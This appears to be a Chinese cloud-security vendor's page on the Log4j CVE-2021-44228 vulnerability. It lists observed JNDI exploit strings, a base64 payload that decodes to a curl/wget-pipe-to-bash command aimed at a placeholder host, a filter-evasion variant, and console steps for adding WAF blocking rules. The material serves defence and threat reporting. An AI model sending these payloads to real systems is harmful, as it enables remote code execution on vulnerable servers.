您好,歡迎進入銳速云官網(wǎng)!
售后熱線:4006-5050-10 QQ客服:2852917158 登錄 注冊
彈性內(nèi)容分發(fā)服務(wù)加快向終端分發(fā)內(nèi)容
防護服務(wù)可管理,降低潛在DDoS攻擊風(fēng)險
專業(yè)穩(wěn)定一站式解決web應(yīng)用核心安全痛點
保護邊緣應(yīng)用安全,提升安全加速體驗
保護邊緣應(yīng)用安全,提升安全加速體驗
云原生的云上邊界網(wǎng)絡(luò)安全防護產(chǎn)品
應(yīng)用一鍵支持 IPv6,2 分鐘合規(guī)
為用戶提供的全方位安全技術(shù)和咨詢服務(wù)
模擬黑客對業(yè)務(wù)系統(tǒng)進行全面深入的安全測試
提供標準化可控的應(yīng)急響應(yīng)服務(wù),還原攻擊路徑并為客戶止損
代碼數(shù)據(jù)庫訪問行為審計、風(fēng)險操作記錄和告警
準確可靠、全場景覆蓋的欺詐檢測服務(wù)
一站式等保咨詢測評服務(wù)
安全運營中心統(tǒng)一遠程進行全天候監(jiān)測和管理的托管式安全服務(wù)
SSL證書提供一站式 HTTPS 解決方案
通過技術(shù)手段防止敏感數(shù)據(jù)意外或惡意泄露的安全措施
對密碼策略、技術(shù)和管理進行現(xiàn)代化升級,以提高安全性和用戶體驗
提供7×24小時準確、全面的漏洞監(jiān)測服務(wù)
專注實戰(zhàn)化安全的下一代防火墻
云上統(tǒng)一、高效、安全的運維通道
網(wǎng)絡(luò)威脅檢測、雙向阻斷,多源情報賦能
數(shù)據(jù)庫訪問行為審計、風(fēng)險操作記錄和告警
應(yīng)用程序產(chǎn)生的日志文件進行收集、分析、存儲和報告的過程
能實時檢測、報警和動態(tài)響應(yīng)
滿足加密合規(guī)需求,保護云上數(shù)據(jù)安全
一鍵完成國密改造,2分鐘合規(guī)
關(guān)于如何緩解 Log4j 中的 CVE-2021-44228、漏洞是如何產(chǎn)生的以及為我們的客戶提供的緩解措施,具體有關(guān)漏洞修補,網(wǎng)上好多教程,自己搜一下。
在撰寫本文時,由于漏洞的嚴重性,我們也正在為客戶推出保護措施,現(xiàn)在有很多關(guān)于掃描和嘗試利用漏洞的數(shù)據(jù),看到被阻止的攻擊最大峰值緩慢增加,而且掃描一整天都是連續(xù)的,我們看到這種情況在繼續(xù)下去。

經(jīng)過我們安全工程師大量數(shù)據(jù)分析總結(jié)出攻擊特征與方法:
控制了該服務(wù)器,并記錄了 Internet 屬性可被利用,這并沒有演示太多。
第二個最受歡迎的請求包含以下內(nèi)容:
${jndi:ldap://x.x.x.x/#Touch}
請求的 User-Agent 字段中:
Mozilla/5.0 ${jndi:ldap://x.x.x.x:5566/ExploitD}/ua
443 的未加密請求,他們試圖使用 http://
${jndi:http://x.x.x.x/callback/https-port-443-and-http-callback-scheme}
有人試圖冒充 Googlebot 并包含一些額外的信息:
Googlebot/2.1(+http://www.google.com/bot.html)${jndi:ldap://x.x.x.x:80/Log4jRCE}
該方案的一個變體是在漏洞利用負載中包含被攻擊網(wǎng)站的名稱:
${jndi:ldap://www.app.example.com.gu.c1me2000ssggnaro4eyyb.example.com/www.app.example.com}
一些參與者沒有使用 LDAP,而是使用了 DNS。但是,LDAP 是迄今為止最常用的協(xié)議:
${jndi:dns://app.example.com/ext}
一個非常有趣的掃描涉及使用 Java 和標準 Linux 命令行工具。有效載荷如下所示:
${jndi:ldap://x.x.x.x:12344/Basic/Command/Base64/KGN1cmwgLXMgeC54LngueDo1ODc0L3kueS55Lnk6NDQsdfdsfdsfIC1PLSB4LngueC54OjU4NzQveS55LnkueTo0NDMpfGJhc2g=}
base64 編碼部分解碼為 curl 并通過管道傳輸?shù)?bash 中:
(curl -s x.x.x.x:5874/y.y.y.y:443||wget -q -O- x.x.x.x:5874/y.y.y.y:443)|bash
請注意, curl/wget 的輸出不是必需的,因此這只是點擊服務(wù)器以向參與者表明該漏洞有效。
最后,我們看到了一些積極的嘗試,例如${jndi:ldap通過使用 Log4j 的其他功能來逃避對字符串的簡單阻塞。例如,一種常見的規(guī)避技術(shù)似乎是使用以下${lower}特征(小寫字符):
${jndi:${lower:l}${lower:d}a${lower:p}://example.com/x
進入用戶中心---安全與加速---域名管理—點擊具域名–點擊《訪問控制》
找到《自定義規(guī)則配置》
增加一條UA規(guī)則

增加一條URL規(guī)則

到此基本可以防完上面所遇到的惡意數(shù)據(jù)針對log4j2的請求
如果還想進一步更加完美雙重保障,可以開啟超級WAF自能防護功能

遇到攻擊,攔截

粵公網(wǎng)安備 44030902000612號